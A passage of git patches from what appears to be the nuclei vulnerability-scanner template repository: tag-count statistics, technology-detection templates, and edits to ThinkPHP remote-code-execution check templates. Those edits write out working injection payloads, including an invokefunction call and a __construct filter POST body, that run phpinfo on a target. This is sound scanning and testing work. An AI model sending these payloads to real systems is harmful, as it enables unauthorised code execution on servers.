1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | | logontracer | 1 | | | | | | | | | -| pihole | 1 | | | | | | | | | -| testrail | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | | fortigates | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | | influxdb | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | | graphite | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | | mpsec | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | | mantis | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | | alertmanager | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| redmine | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| s3 | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 7986a5f646..f872956ab3 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 | -| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 | -| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 | -| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 | -| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | | -| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 199 | gy741 | 75 | takeovers | 64 | | | | | -| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | | -| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 155 | madrobot | 61 | workflows | 37 | | | | | +| cve | 803 | daffainfo | 280 | cves | 803 | info | 658 | http | 2065 | +| lfi | 325 | pikpikcu | 276 | vulnerabilities | 312 | high | 620 | file | 46 | +| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | +| panel | 252 | pdteam | 199 | technologies | 197 | critical | 276 | dns | 12 | +| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | +| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | +| tech | 188 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 62 | file | 46 | | | | | +| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | From 769e7c4b43c9378df335fdcc03e77ad4fb3b120d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 30 Sep 2021 17:35:28 +0530 Subject: [PATCH 2627/4083] Create fatpipe-warp-detect.yaml --- technologies/fatpipe-warp-detect.yaml | 31 +++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 technologies/fatpipe-warp-detect.yaml diff --git a/technologies/fatpipe-warp-detect.yaml b/technologies/fatpipe-warp-detect.yaml new file mode 100644 index 0000000000..1659434b60 --- /dev/null +++ b/technologies/fatpipe-warp-detect.yaml @@ -0,0 +1,31 @@ +id: fatpipe-warp-detect + +info: + name: FatPipe WARP Detect + author: princechaddha + severity: info + tags: tech,fatpipe + +requests: + - method: GET + path: + - "{{BaseURL}}/fpui/jsp/login.jsp" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "FatPipe WARP | Log in" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '
    ([0-9.a-z]+)<\/h5>' From 0eb0123532af629cf22c903e76fbd26172f8fa43 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 30 Sep 2021 17:35:59 +0530 Subject: [PATCH 2628/4083] Update fatpipe-mpvpn-detect.yaml --- technologies/fatpipe-mpvpn-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/fatpipe-mpvpn-detect.yaml b/technologies/fatpipe-mpvpn-detect.yaml index e1f1325320..f1d722039e 100644 --- a/technologies/fatpipe-mpvpn-detect.yaml +++ b/technologies/fatpipe-mpvpn-detect.yaml @@ -26,5 +26,6 @@ requests: extractors: - type: regex part: body + group: 1 regex: - '
    ([0-9.a-z]+)<\/h5>' From afd20497f78f42ce4c35c9cdf18cce42f98bd23f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 30 Sep 2021 17:45:49 +0530 Subject: [PATCH 2629/4083] Update and rename yzmcms-detected.yaml to yzmcms-detect.yaml --- technologies/{yzmcms-detected.yaml => yzmcms-detect.yaml} | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) rename technologies/{yzmcms-detected.yaml => yzmcms-detect.yaml} (90%) diff --git a/technologies/yzmcms-detected.yaml b/technologies/yzmcms-detect.yaml similarity index 90% rename from technologies/yzmcms-detected.yaml rename to technologies/yzmcms-detect.yaml index 16549afa11..e7f31c36a2 100644 --- a/technologies/yzmcms-detected.yaml +++ b/technologies/yzmcms-detect.yaml @@ -1,4 +1,4 @@ -id: yzmcms-detected +id: yzmcms-detect info: name: YzmCMS Detect @@ -18,5 +18,6 @@ requests: - 200 - type: word + part: body words: - 'Powered By Date: Thu, 30 Sep 2021 17:46:02 +0530 Subject: [PATCH 2630/4083] Delete wazuh-detected.yaml --- technologies/wazuh-detected.yaml | 22 ---------------------- 1 file changed, 22 deletions(-) delete mode 100644 technologies/wazuh-detected.yaml diff --git a/technologies/wazuh-detected.yaml b/technologies/wazuh-detected.yaml deleted file mode 100644 index 431b1a5003..0000000000 --- a/technologies/wazuh-detected.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wazuh-detected - -info: - name: Wazuh Detect - author: pikpikcu - severity: info - tags: wazuh,tech - -requests: - - method: GET - path: - - '{{BaseURL}}/app/login' - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Wazuh" From 5114232192b0d3a9de4a531affa5c72e0d27397d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 Sep 2021 12:45:10 +0000 Subject: [PATCH 2631/4083] Auto README Update [Thu Sep 30 12:45:10 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 3f49b40750..9893583d2f 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 731 | pikpikcu | 273 | cves | 731 | info | 650 | http | 1983 | -| lfi | 265 | dhiyaneshdk | 263 | vulnerabilities | 307 | high | 558 | file | 46 | -| panel | 252 | daffainfo | 216 | exposed-panels | 250 | medium | 451 | network | 42 | -| xss | 246 | pdteam | 196 | technologies | 192 | critical | 276 | dns | 12 | -| exposure | 233 | geeknik | 153 | exposures | 188 | low | 153 | | | -| wordpress | 229 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 199 | gy741 | 75 | takeovers | 64 | | | | | -| tech | 183 | pussycat0x | 68 | default-logins | 56 | | | | | -| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | | -| wp-plugin | 155 | madrobot | 61 | workflows | 37 | | | | | +| cve | 803 | daffainfo | 280 | cves | 803 | info | 658 | http | 2065 | +| lfi | 325 | pikpikcu | 276 | vulnerabilities | 312 | high | 620 | file | 46 | +| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | +| panel | 252 | pdteam | 199 | technologies | 197 | critical | 276 | dns | 12 | +| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | +| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | +| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | +| tech | 188 | pussycat0x | 70 | default-logins | 56 | | | | | +| wp-plugin | 167 | princechaddha | 62 | file | 46 | | | | | +| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | -**166 directories, 2227 files**. +**166 directories, 2230 files**. From 88f6bba576ce8d33d95a82774c586a21b2ff6623 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 30 Sep 2021 18:35:14 +0530 Subject: [PATCH 2632/4083] Added thinkphp keyword from response to avoid false positive --- vulnerabilities/thinkphp/thinkphp-2-rce.yaml | 3 +++ vulnerabilities/thinkphp/thinkphp-5022-rce.yaml | 3 +++ vulnerabilities/thinkphp/thinkphp-5023-rce.yaml | 5 +++++ .../thinkphp/thinkphp-509-information-disclosure.yaml | 4 +++- 4 files changed, 14 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml index b894e5efb8..e48e8357e1 100644 --- a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml @@ -12,13 +12,16 @@ requests: - method: GET path: - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D" + matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" + - "ThinkPHP" condition: and + - type: status status: - 200 diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml index 0e9298e40c..605df4bb17 100644 --- a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml @@ -12,13 +12,16 @@ requests: - method: GET path: - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" + matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" + - "ThinkPHP" condition: and + - type: status status: - 200 diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml index b52d854e1f..952c9ed7b9 100644 --- a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml @@ -12,16 +12,21 @@ requests: - method: POST path: - "{{BaseURL}}/index.php?s=captcha" + headers: Content-Type: application/x-www-form-urlencoded + body: "_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1" + matchers-condition: and matchers: - type: word words: - "PHP Extension" - "PHP Version" + - "ThinkPHP" condition: and + - type: status status: - 200 \ No newline at end of file diff --git a/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml 